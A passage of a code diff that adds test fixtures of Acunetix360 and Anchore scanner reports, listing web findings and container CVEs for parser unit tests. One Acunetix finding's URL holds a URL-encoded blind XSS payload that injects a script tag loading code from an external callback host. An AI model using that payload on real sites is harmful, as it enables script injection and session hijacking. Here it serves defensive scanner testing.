    CSP will act as a safeguard that can prevent an attacker from successfully exploiting Cross-site Scripting vulnerabilities in your website and is advised in any kind of application. Please make sure to scan your application again with Content Security Policy checks enabled after implementing CSP, in order to avoid common mistakes that can impact the effectiveness of your policy. There are a few pitfalls that can render your CSP policy useless and we highly recommend reading the resources linked in the reference section before you start to implement one. 

    \n
    ", + "RemedyReferences": "", + "Severity": "High", + "State": "Revived", + "Type": "PossibleBlindXss", + "Url": "http://php.testsparker.com/products.php?pro=%27%22--%3E%3C%2fstyle%3E%3C%2fscRipt%3E%3CscRipt%20src%3d%22%2f%2fpbgjnvv2k89fhedxarfdk4pywx6zqjmszpdlk5ftvlu%26%2346%3br87%26%2346%3bme%22%3E%3C%2fscRipt%3E" + }, + { + "Certainty": 90, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "6.5" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "5.7" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "5.7" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N/E:U/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "200", + "Hipaa": "", + "Owasp": "A6", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "" + }, + "Confirmed": false, + "Description": "

    Acunetix360 detected that no Referrer-Policy header implemented.

    \n

    Referrer-Policy is a security header designed to prevent cross-domain Referer leakage. 

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Page Type", + "Value": "Other" + } + ], + "FirstSeenDate": "16/06/2021 12:30 PM", + "HttpRequest": { + "Content": "GET / HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Acunetix360\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 136\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:09 GMT\r\n\r\n\n\n\n\n", + "Duration": 45.9707, + "StatusCode": 200 + }, + "LookupId": "4576a39d-e4a5-481f-3fcf-ad490209f34b", + "Impact": "

    Referer header is a request header that indicates the site which the traffic originated from. If there is no adequate prevention in place, the  URL itself, and even sensitive information contained in the URL will be leaked to the cross-site.

    \n

    The lack of Referrer-Policy header might affect privacy of the users and site's itself

    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Referrer-Policy Not Implemented", + "ProofOfConcept": "", + "RemedialActions": "

    In a response header:

    \n
    Referrer-Policy: no-referrer | same-origin | origin | strict-origin | no-origin-when-downgrading 
    \n

    In a META tag

    \n
    <meta name=\"Referrer-Policy\" value=\"no-referrer | same-origin\"/>
    \n

    In an element attribute

    \n
    <a href=\"http://crosssite.example.com\" rel=\"noreferrer\"></a> 
    \n

    or

    \n
    <a href=\"http://crosssite.example.com\" referrerpolicy=\"no-referrer | same-origin | origin | strict-origin | no-origin-when-downgrading\"></a>
    ", + "RemedialProcedure": "

    Please implement a Referrer-Policy by using the Referrer-Policy response header or by declaring it in the meta tags. It’s also possible to control referrer information over an HTML-element by using the rel attribute.

    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "ReferrerPolicyNotImplemented", + "Url": "http://php.testsparker.com/" + } + ] +} \ No newline at end of file diff --git a/unittests/scans/acunetix360/acunetix360_multiple_cwe.json b/unittests/scans/acunetix360/acunetix360_multiple_cwe.json new file mode 100644 index 00000000000..24959cbb31d --- /dev/null +++ b/unittests/scans/acunetix360/acunetix360_multiple_cwe.json @@ -0,0 +1,85 @@ +{ + "Generated": "25/06/2021 09:59 AM", + "Target": { + "Duration": "00:00:41.3968969", + "Initiated": "25/06/2021 09:53 AM", + "ScanId": "663eb6e88d9e4f4d9e00ad52017aa66d", + "Url": "http://php.testsparker.com/" + }, + "Vulnerabilities": [ + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "107", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "5.7" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "5.5" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "5.5" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "16, 200", + "Hipaa": "", + "Owasp": "A5", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "15" + }, + "Confirmed": true, + "Description": "

    Acunetix360 identified a cookie not marked as HTTPOnly.

    \n

    HTTPOnly cookies cannot be read by client-side scripts, therefore marking a cookie as HTTPOnly can provide an additional layer of protection against cross-site scripting attacks.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Identified Cookie(s)", + "Value": "PHPSESSID" + }, + { + "Name": "Cookie Source", + "Value": "HTTP Header" + }, + { + "Name": "Page Type", + "Value": "Login" + } + ], + "FirstSeenDate": "16/06/2021 12:30 PM", + "HttpRequest": { + "Content": "GET /auth/login.php HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nReferer: http://php.testsparker.com/auth/\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Acunetix360\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nSet-Cookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d; path=/\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nContent-Length: 3061\r\nX-Powered-By: PHP/5.2.6\r\nPragma: no-cache\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\n\n\n", + "Duration": 41.4849, + "StatusCode": 200 + }, + "LookupId": "735f4503-e9eb-4b4c-4306-ad49020a4c4b", + "Impact": "
    During a cross-site scripting attack, an attacker might easily access cookies and hijack the victim's session.
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Cookie Not Marked as HttpOnly", + "ProofOfConcept": "", + "RemedialActions": "
    \n
      \n
    1. See the remedy for solution.
    2. \n
    3. Consider marking all of the cookies used by the application as HTTPOnly. (After these changes javascript code will not be able to read cookies.)
    4. \n
    \n
    ", + "RemedialProcedure": "
    Mark the cookie as HTTPOnly. This will be an extra layer of defense against XSS. However this is not a silver bullet and will not protect the system against cross-site scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.
    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "CookieNotMarkedAsHttpOnly", + "Url": "http://php.testsparker.com/auth/login.php" + } + ] +} \ No newline at end of file diff --git a/unittests/scans/acunetix360/acunetix360_one_finding.json b/unittests/scans/acunetix360/acunetix360_one_finding.json new file mode 100644 index 00000000000..23c26a24f88 --- /dev/null +++ b/unittests/scans/acunetix360/acunetix360_one_finding.json @@ -0,0 +1,85 @@ +{ + "Generated": "25/06/2021 09:59 AM", + "Target": { + "Duration": "00:00:41.3968969", + "Initiated": "25/06/2021 09:53 AM", + "ScanId": "663eb6e88d9e4f4d9e00ad52017aa66d", + "Url": "http://php.testsparker.com/" + }, + "Vulnerabilities": [ + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "107", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "5.7" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "5.5" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "5.5" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "16", + "Hipaa": "", + "Owasp": "A5", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "15" + }, + "Confirmed": true, + "Description": "

    Acunetix360 identified a cookie not marked as HTTPOnly.

    \n

    HTTPOnly cookies cannot be read by client-side scripts, therefore marking a cookie as HTTPOnly can provide an additional layer of protection against cross-site scripting attacks.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Identified Cookie(s)", + "Value": "PHPSESSID" + }, + { + "Name": "Cookie Source", + "Value": "HTTP Header" + }, + { + "Name": "Page Type", + "Value": "Login" + } + ], + "FirstSeenDate": "16/06/2021 12:30 PM", + "HttpRequest": { + "Content": "GET /auth/login.php HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nReferer: http://php.testsparker.com/auth/\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Acunetix360\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nSet-Cookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d; path=/\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nContent-Length: 3061\r\nX-Powered-By: PHP/5.2.6\r\nPragma: no-cache\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\n\n\n", + "Duration": 41.4849, + "StatusCode": 200 + }, + "LookupId": "735f4503-e9eb-4b4c-4306-ad49020a4c4b", + "Impact": "
    During a cross-site scripting attack, an attacker might easily access cookies and hijack the victim's session.
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Cookie Not Marked as HttpOnly", + "ProofOfConcept": "", + "RemedialActions": "
    \n
      \n
    1. See the remedy for solution.
    2. \n
    3. Consider marking all of the cookies used by the application as HTTPOnly. (After these changes javascript code will not be able to read cookies.)
    4. \n
    \n
    ", + "RemedialProcedure": "
    Mark the cookie as HTTPOnly. This will be an extra layer of defense against XSS. However this is not a silver bullet and will not protect the system against cross-site scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.
    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "CookieNotMarkedAsHttpOnly", + "Url": "http://php.testsparker.com/auth/login.php" + } + ] +} \ No newline at end of file diff --git a/unittests/scans/acunetix360/acunetix360_zero_finding.json b/unittests/scans/acunetix360/acunetix360_zero_finding.json new file mode 100644 index 00000000000..b33009971e5 --- /dev/null +++ b/unittests/scans/acunetix360/acunetix360_zero_finding.json @@ -0,0 +1,10 @@ +{ + "Generated": "25/06/2021 09:57 AM", + "Target": { + "Duration": "00:01:16.6130466", + "Initiated": "25/06/2021 01:42 AM", + "ScanId": "0a110f61b1f949ff30c8ad5104dfd9f5", + "Url": "http://php.testsparker.com/" + }, + "Vulnerabilities": [] +} \ No newline at end of file diff --git a/unittests/scans/anchore/many_vulns.json b/unittests/scans/anchore/many_vulns.json new file mode 100644 index 00000000000..3f43b12bf3d --- /dev/null +++ b/unittests/scans/anchore/many_vulns.json @@ -0,0 +1,380 @@ +{ + "imageDigest": "sha256:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx", + "vulnerabilities": [ + { + "feed": "vulnerabilities", + "feed_group": "debian:9", + "fix": "None", + "package": "apt-1.4.9", + "package_cpe": "None", + "package_name": "apt", + "package_path": "None", + "package_type": "dpkg", + "package_version": "1.4.9", + "severity": "Negligible", + "url": "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "vuln": "CVE-2011-3374" + }, + { + "feed": "vulnerabilities", + "feed_group": "debian:9", + "fix": "None", + "package": "libgnutls30-3.5.8-5+deb9u4", + "package_cpe": "None", + "package_name": "libgnutls30", + "package_path": "None", + "package_type": "dpkg", + "package_version": "3.5.8-5+deb9u4", + "severity": "Medium", + "url": "https://security-tracker.debian.org/tracker/CVE-2011-3389", + "vuln": "CVE-2011-3389" + }, + { + "feed": "vulnerabilities", + "feed_group": "debian:9", + "fix": "None", + "package": "libgnutls30-3.5.8-5+deb9u4", + "package_cpe": "None", + "package_name": "libgnutls30", + "package_path": "None", + "package_type": "dpkg", + "package_version": "3.5.8-5+deb9u4", + "severity": "Low", + "url": "https://security-tracker.debian.org/tracker/CVE-2018-16868", + "vuln": "CVE-2018-16868" + }, + { + "feed": "vulnerabilities", + "feed_group": "debian:9", + "fix": "232-25+deb9u10", + "package": "libsystemd0-232-25+deb9u9", + "package_cpe": "None", + "package_name": "libsystemd0", + "package_path": "None", + "package_type": "dpkg", + "package_version": "232-25+deb9u9", + "severity": "High", + "url": "https://security-tracker.debian.org/tracker/CVE-2018-15686", + "vuln": "CVE-2018-15686" + }, + + { + "feed": "vulnerabilities", + "feed_group": "debian:9", + "fix": "232-25+deb9u10", + "package": "libudev1-232-25+deb9u9", + "package_cpe": "None", + "package_name": "libudev1", + "package_path": "None", + "package_type": "dpkg", + "package_version": "232-25+deb9u9", + "severity": "High", + "url": "https://security-tracker.debian.org/tracker/CVE-2018-15686", + "vuln": "CVE-2018-15686" + }, + { + "feed": "vulnerabilities", + "feed_group": "debian:9", + "fix": "232-25+deb9u11", + "package": "libudev1-232-25+deb9u9", + "package_cpe": "None", + "package_name": "libudev1", + "package_path": "None", + "package_type": "dpkg", + "package_version": "232-25+deb9u9", + "severity": "Medium", + "url": "https://security-tracker.debian.org/tracker/CVE-2019-3842", + "vuln": "CVE-2019-3842" + }, + { + "feed": "vulnerabilities", + "feed_group": "debian:9", + "fix": "None", + "package": "login-1:4.4-4.1", + "package_cpe": "None", + "package_name": "login", + "package_path": "None", + "package_type": "dpkg", + "package_version": "1:4.4-4.1", + "severity": "Negligible", + "url": "https://security-tracker.debian.org/tracker/CVE-2007-5686", + "vuln": "CVE-2007-5686" + }, + { + "feed": "vulnerabilities", + "feed_group": "debian:9", + "fix": "None", + "package": "login-1:4.4-4.1", + "package_cpe": "None", + "package_name": "login", + "package_path": "None", + "package_type": "dpkg", + "package_version": "1:4.4-4.1", + "severity": "Negligible", + "url": "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "vuln": "CVE-2013-4235" + }, + { + "feed": "vulnerabilities", + "feed_group": "debian:9", + "fix": "None", + "package": "mercurial-4.0-1+deb9u1", + "package_cpe": "None", + "package_name": "mercurial", + "package_path": "None", + "package_type": "dpkg", + "package_version": "4.0-1+deb9u1", + "severity": "High", + "url": "https://security-tracker.debian.org/tracker/CVE-2017-17458", + "vuln": "CVE-2017-17458" + }, + { + "feed": "vulnerabilities", + "feed_group": "debian:9", + "fix": "None", + "package": "mercurial-4.0-1+deb9u1", + "package_cpe": "None", + "package_name": "mercurial", + "package_path": "None", + "package_type": "dpkg", + "package_version": "4.0-1+deb9u1", + "severity": "Medium", + "url": "https://security-tracker.debian.org/tracker/CVE-2018-1000132", + "vuln": "CVE-2018-1000132" + }, + { + "feed": "vulnerabilities", + "feed_group": "debian:9", + "fix": "None", + "package": "mercurial-4.0-1+deb9u1", + "package_cpe": "None", + "package_name": "mercurial", + "package_path": "None", + "package_type": "dpkg", + "package_version": "4.0-1+deb9u1", + "severity": "Medium", + "url": "https://security-tracker.debian.org/tracker/CVE-2018-13346", + "vuln": "CVE-2018-13346" + }, + { + "feed": "vulnerabilities", + "feed_group": "debian:9", + "fix": "None", + "package": "mercurial-4.0-1+deb9u1", + "package_cpe": "None", + "package_name": "mercurial", + "package_path": "None", + "package_type": "dpkg", + "package_version": "4.0-1+deb9u1", + "severity": "High", + "url": "https://security-tracker.debian.org/tracker/CVE-2018-13347", + "vuln": "CVE-2018-13347" + }, + { + "feed": "vulnerabilities", + "feed_group": "debian:9", + "fix": "None", + "package": "mercurial-4.0-1+deb9u1", + "package_cpe": "None", + "package_name": "mercurial", + "package_path": "None", + "package_type": "dpkg", + "package_version": "4.0-1+deb9u1", + "severity": "Medium", + "url": "https://security-tracker.debian.org/tracker/CVE-2018-13348", + "vuln": "CVE-2018-13348" + }, + { + "feed": "vulnerabilities", + "feed_group": "debian:9", + "fix": "None", + "package": "mercurial-4.0-1+deb9u1", + "package_cpe": "None", + "package_name": "mercurial", + "package_path": "None", + "package_type": "dpkg", + "package_version": "4.0-1+deb9u1", + "severity": "Medium", + "url": "https://security-tracker.debian.org/tracker/CVE-2018-17983", + "vuln": "CVE-2018-17983" + }, + { + "feed": "vulnerabilities", + "feed_group": "debian:9", + "fix": "None", + "package": "mercurial-common-4.0-1+deb9u1", + "package_cpe": "None", + "package_name": "mercurial-common", + "package_path": "None", + "package_type": "dpkg", + "package_version": "4.0-1+deb9u1", + "severity": "High", + "url": "https://security-tracker.debian.org/tracker/CVE-2017-17458", + "vuln": "CVE-2017-17458" + }, + { + "feed": "vulnerabilities", + "feed_group": "debian:9", + "fix": "None", + "package": "mercurial-common-4.0-1+deb9u1", + "package_cpe": "None", + "package_name": "mercurial-common", + "package_path": "None", + "package_type": "dpkg", + "package_version": "4.0-1+deb9u1", + "severity": "Medium", + "url": "https://security-tracker.debian.org/tracker/CVE-2018-1000132", + "vuln": "CVE-2018-1000132" + }, + { + "feed": "vulnerabilities", + "feed_group": "debian:9", + "fix": "None", + "package": "mercurial-common-4.0-1+deb9u1", + "package_cpe": "None", + "package_name": "mercurial-common", + "package_path": "None", + "package_type": "dpkg", + "package_version": "4.0-1+deb9u1", + "severity": "Medium", + "url": "https://security-tracker.debian.org/tracker/CVE-2018-13346", + "vuln": "CVE-2018-13346" + }, + { + "feed": "vulnerabilities", + "feed_group": "debian:9", + "fix": "None", + "package": "tar-1.29b-1.1", + "package_cpe": "None", + "package_name": "tar", + "package_path": "None", + "package_type": "dpkg", + "package_version": "1.29b-1.1", + "severity": "Negligible", + "url": "https://security-tracker.debian.org/tracker/CVE-2019-9923", + "vuln": "CVE-2019-9923" + }, + { + "feed": "vulnerabilities", + "feed_group": "debian:9", + "fix": "1.18-5+deb9u3", + "package": "wget-1.18-5+deb9u2", + "package_cpe": "None", + "package_name": "wget", + "package_path": "None", + "package_type": "dpkg", + "package_version": "1.18-5+deb9u2", + "severity": "Unknown", + "url": "https://security-tracker.debian.org/tracker/CVE-2019-5953", + "vuln": "CVE-2019-5953" + }, + { + "feed": "vulnerabilities", + "feed_group": "debian:9", + "fix": "virtual-fix-test", + "package": "test-critical-pkg-1.0", + "package_cpe": "None", + "package_name": "test-critical", + "package_path": "None", + "package_type": "dpkg", + "package_version": "1.0", + "severity": "Critical", + "url": "https://whatever-tracker-/tracker/CVE-9999-0000", + "vuln": "CVE-9999-0000" + }, + { + "feed": "vulndb", + "feed_group": "vulndb:vulnerabilities", + "fix": "1.18", + "nvd_data": [], + "package": "jersey-1.13", + "package_cpe": "cpe:/a:-:jersey:1.13:-:-", + "package_cpe23": "cpe:2.3:a:-:jersey:1.13:-:-:-:-:-:-:-", + "package_name": "jersey", + "package_path": "/usr/share/myapp/myapp.war:sources/jersey-apache-client-1.13-sources-jar/jersey-apache-client-1.13-sources.jar", + "package_type": "java", + "package_version": "1.13", + "severity": "Medium", + "url": "http://dev-anchore-engine-api:8228/v1/query/vulnerabilities?id=VULNDB-103881", + "vendor_data": [ + { + "cvss_v2": { + "base_score": 5.0, + "exploitability_score": 10.0, + "impact_score": 2.9 + }, + "cvss_v3": { + "base_score": -1.0, + "exploitability_score": -1.0, + "impact_score": -1.0 + }, + "id": "VULNDB-103881" + } + ], + "vuln": "VULNDB-103881" + }, + { + "feed": "vulndb", + "feed_group": "vulndb:vulnerabilities", + "fix": "1.18", + "nvd_data": [], + "package": "jersey-1.13", + "package_cpe": "cpe:/a:-:jersey:1.13:-:-", + "package_cpe23": "cpe:2.3:a:-:jersey:1.13:-:-:-:-:-:-:-", + "package_name": "jersey", + "package_path": "/usr/share/myapp/myapp.war:sources/jersey-client-1.13-sources-jar/jersey-client-1.13-sources.jar", + "package_type": "java", + "package_version": "1.13", + "severity": "Medium", + "url": "http://dev-anchore-engine-api:8228/v1/query/vulnerabilities?id=VULNDB-103881", + "vendor_data": [ + { + "cvss_v2": { + "base_score": 5.0, + "exploitability_score": 10.0, + "impact_score": 2.9 + }, + "cvss_v3": { + "base_score": -1.0, + "exploitability_score": -1.0, + "impact_score": -1.0 + }, + "id": "VULNDB-103881" + } + ], + "vuln": "VULNDB-103881" + }, + { + "feed": "vulndb", + "feed_group": "vulndb:vulnerabilities", + "fix": "1.18", + "nvd_data": [], + "package": "jersey-1.13", + "package_cpe": "cpe:/a:-:jersey:1.13:-:-", + "package_cpe23": "cpe:2.3:a:-:jersey:1.13:-:-:-:-:-:-:-", + "package_name": "jersey", + "package_path": "/usr/share/myapp/myapp.war:sources/jersey-core-1.13-sources-jar/jersey-core-1.13-sources.jar", + "package_type": "java", + "package_version": "1.13", + "severity": "Medium", + "url": "http://dev-anchore-engine-api:8228/v1/query/vulnerabilities?id=VULNDB-103881", + "vendor_data": [ + { + "cvss_v2": { + "base_score": 5.0, + "exploitability_score": 10.0, + "impact_score": 2.9 + }, + "cvss_v3": { + "base_score": -1.0, + "exploitability_score": -1.0, + "impact_score": -1.0 + }, + "id": "VULNDB-103881" + } + ], + "vuln": "VULNDB-103881" + } +], + "vulnerability_type": "os" +} diff --git a/unittests/scans/anchore/many_vulns_2.4.1.json b/unittests/scans/anchore/many_vulns_2.4.1.json new file mode 100644 index 00000000000..4db68e5f752 --- /dev/null +++ b/unittests/scans/anchore/many_vulns_2.4.1.json @@ -0,0 +1,3973 @@ +{ + "base_digest": "sha256:1e40570071ce81df14d183c6227c7cee125ac5876344fded9dc412d04996a658", + "image_digest": "sha256:e010a676dba57f2110960b4e81a1d9098585ed6a8ac79e8c4a552ba4018d1674", + "vulnerabilities": [ + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 6.4, + "exploitability_score": 10, + "impact_score": 4.9 + }, + "cvss_v3": { + "base_score": 6.5, + "exploitability_score": 3.9, + "impact_score": 2.5 + }, + "id": "CVE-2020-8927" + } + ], + "package": "brotli-1.0.6-2.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "brotli", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "1.0.6-2.el8", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-8927", + "vendor_data": [], + "vuln": "CVE-2020-8927", + "extra": { + "description": "A buffer overflow exists in the Brotli library versions prior to 1.0.8 where an attacker controlling the input length of a \"one-shot\" decompression request to a script can trigger a crash, which happens when copying over chunks of data larger than 2 GiB. It is recommended to update your Brotli library to 1.0.8 or later. If one cannot update, we recommend to use the \"streaming\" API as opposed to the \"one-shot\" API, and impose chunk size limits.", + "id": "CVE-2020-8927", + "link": "https://access.redhat.com/security/cve/CVE-2020-8927", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "PARTIAL", + "base_score": 6.4, + "confidentiality_impact": "NONE", + "exploitability_score": 10, + "impact_score": 4.9, + "integrity_impact": "PARTIAL" + }, + "severity": "Medium", + "vector_string": "AV:N/AC:L/Au:N/C:N/I:P/A:P", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "NETWORK", + "availability_impact": "LOW", + "base_score": 6.5, + "base_severity": "Medium", + "confidentiality_impact": "NONE", + "exploitability_score": 3.9, + "impact_score": 2.5, + "integrity_impact": "LOW", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", + "version": "3.1" + }, + "id": "CVE-2020-8927" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 5, + "exploitability_score": 10, + "impact_score": 2.9 + }, + "cvss_v3": { + "base_score": 7.5, + "exploitability_score": 3.9, + "impact_score": 3.6 + }, + "id": "CVE-2020-8231" + } + ], + "package": "curl-7.61.1-14.el8_3.1", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "curl", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "7.61.1-14.el8_3.1", + "severity": "Low", + "url": "https://access.redhat.com/security/cve/CVE-2020-8231", + "vendor_data": [], + "vuln": "CVE-2020-8231", + "extra": { + "description": "Due to use of a dangling pointer, libcurl 7.29.0 through 7.71.1 can use the wrong connection when sending data.", + "id": "CVE-2020-8231", + "link": "https://access.redhat.com/security/cve/CVE-2020-8231", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "NONE", + "base_score": 5, + "confidentiality_impact": "PARTIAL", + "exploitability_score": 10, + "impact_score": 2.9, + "integrity_impact": "NONE" + }, + "severity": "Medium", + "vector_string": "AV:N/AC:L/Au:N/C:P/I:N/A:N", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "NETWORK", + "availability_impact": "NONE", + "base_score": 7.5, + "base_severity": "High", + "confidentiality_impact": "HIGH", + "exploitability_score": 3.9, + "impact_score": 3.6, + "integrity_impact": "NONE", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "version": "3.1" + }, + "id": "CVE-2020-8231" + } + ], + "references": null, + "severity": "Low", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 4.3, + "exploitability_score": 8.6, + "impact_score": 2.9 + }, + "cvss_v3": { + "base_score": 3.7, + "exploitability_score": 2.2, + "impact_score": 1.4 + }, + "id": "CVE-2020-8284" + } + ], + "package": "curl-7.61.1-14.el8_3.1", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "curl", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "7.61.1-14.el8_3.1", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-8284", + "vendor_data": [], + "vuln": "CVE-2020-8284", + "extra": { + "description": "A malicious server can use the FTP PASV response to trick curl 7.73.0 and earlier into connecting back to a given IP address and port, and this way potentially make curl extract information about services that are otherwise private and not disclosed, for example doing port scanning and service banner extractions.", + "id": "CVE-2020-8284", + "link": "https://access.redhat.com/security/cve/CVE-2020-8284", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "MEDIUM", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "NONE", + "base_score": 4.3, + "confidentiality_impact": "PARTIAL", + "exploitability_score": 8.6, + "impact_score": 2.9, + "integrity_impact": "NONE" + }, + "severity": "Medium", + "vector_string": "AV:N/AC:M/Au:N/C:P/I:N/A:N", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "HIGH", + "attack_vector": "NETWORK", + "availability_impact": "NONE", + "base_score": 3.7, + "base_severity": "Low", + "confidentiality_impact": "LOW", + "exploitability_score": 2.2, + "impact_score": 1.4, + "integrity_impact": "NONE", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", + "version": "3.1" + }, + "id": "CVE-2020-8284" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 5, + "exploitability_score": 10, + "impact_score": 2.9 + }, + "cvss_v3": { + "base_score": 7.5, + "exploitability_score": 3.9, + "impact_score": 3.6 + }, + "id": "CVE-2020-8285" + } + ], + "package": "curl-7.61.1-14.el8_3.1", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "curl", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": 